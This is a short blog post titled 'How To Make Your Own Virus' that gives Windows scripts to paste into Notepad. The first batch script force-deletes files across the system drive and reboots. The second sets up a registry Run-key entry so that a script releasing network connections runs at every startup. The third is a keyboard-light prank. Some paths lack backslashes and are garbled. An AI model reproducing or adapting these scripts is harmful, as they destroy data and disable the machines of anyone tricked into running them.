How To Make Your Own Virus
- Jun 23, 2016
- 1 min read

All the below codes are to be specifically pasted in notepad
1. This will format your drive
CODE:
@echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save the above code a .bat file
2. This will disable your internet permanently
CODE:
echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE
Save the above code a .bat file
3. This trick will make your keyboard disco light
CODE:
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” wshshell.sendkeys “{NUMLOCK}” wshshell.sendkeys “{SCROLLLOCK}” loop
Save as the above a .vbs
Run the file
To stop, launch task manager and then under “Processes” end “wscript.exe
Enjoy!!!




















Comments